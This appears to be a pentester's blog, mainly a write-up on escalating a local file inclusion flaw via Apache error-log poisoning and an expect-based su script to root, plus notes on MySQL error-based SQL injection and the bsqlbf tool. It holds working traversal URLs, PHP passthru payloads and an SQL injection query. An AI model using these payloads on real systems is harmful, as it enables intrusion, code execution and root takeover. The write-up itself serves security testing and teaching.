www.notsosecure.com

Recently on a pentest i came accross an interesting Local file inclusion vulnerability. On this occassion it was definitely not a RFI and all i could do was include files from local app server.

E.g. http://vulnsite.com?exec=aaa/../../../../../etc/passwd%00aa

returned the /etc/passwd file. The application server was running as ‘apache’ user and it didnt have permissions to read /etc/shadow or to do anything “interesting”.

Code Execution:

There are quite a few nice articles on internet on how one can do code execution from LFI. Essentially, you try to insert php code into certain files and then try to include these files. These files typically are:

Apache access logs
Apache error logs
/proc/self/environ

etc.

On this occassion the ‘apache’ user had access to read the error logs. So, when you access a URI such as:

http://vuln.com/foo%3c%3fphp%20passthru('id')%20%3f%3e

It adds the following line to apache’s error log:

404 file not found foo<?php passthru(’id’);?>

Now, you can include the error log files and execute the OS code:

http://vulnsite.com?exec=aaa/../../../../../usr/local/apache/logs/error_logs%00a

Getting Root:

On this occasion, i was lucky and i spotted a file which had a clear text root password in it. However, getting root wasnt very easy, as i could not figure out an easy way to provide this root password within the php script. In the end after searching for quite a bit, i found a way to do this in expect with the following 1 line of php script:

<?php passthru('echo -e \'#!/usr/bin/expect -f\nset password [lrange $argv 0 0]; set cmd [lrange $argv 1 1];set timeout -1; spawn su -c "$cmd" ;match_max 100000 ;expect "*?assword:*"; send -- "$password\r"; send -- "\r"; expect eof\'>/tmp/su.exp&/usr/bin/expect /tmp/su.exp passw0rd whoami>>/tmp/out.txt');?>

This script will do the following:
1. create an expect script(/tmp/su.exp) which will take the root (su) password and command to execute as argument.
2. run the expect script with the root password and command to run as root.

Enjoy the root privileges!
P.S: it is quite common to see expect installed on *nix application servers

Here are my slides from Blackhat 2010.

——————————————————————-
Videos:

Demo1:

Demo2:

Demo 3:

Demo 4:

The new version of bsqlbf is now available for download. The new addition is the execution of any metasploit payload after executing OS code against Oracle database server by exploiting SQL Injection from web apps.

Project Homepage

Video

A colleague of mine(Aleks) forwarded me a russian presentation on exploiting SQL Injection:

http://devteev.blogspot.com/2009/10/advanced-sql-injection-lab-full-pack.html

Of all the slides, i particular liked the one in which the author demonstrates that if the mysql error messages have been enabled (using mysql_error() function), then it is possible to retrieve the data from the back-end database using the ExtractValue() function:
——————————————
>SELECT 1 AND ExtractValue(1, CONCAT(0×5c, (SELECT @@VERSION)))

produces:

Error Code : 1105
XPATH syntax error: ‘\5.1.44-community’

———————-
This should not be confused with the php errors. While the php errors are usually enabled its not “very” common to see developers printing the mysql errors using mysql_error() function. However, its still good to know and could sometimes come handy.

Overall, very nice presentation.

This year, i will be talking at Blackhat and Defcon. The talk is titled “Hacking Oracle From Web Apps”. The details about the talk can be found here. I am also releasing a small teaser video of the new bsqlbf version which i will be releasing soon. See you in Vegas!

Link to the video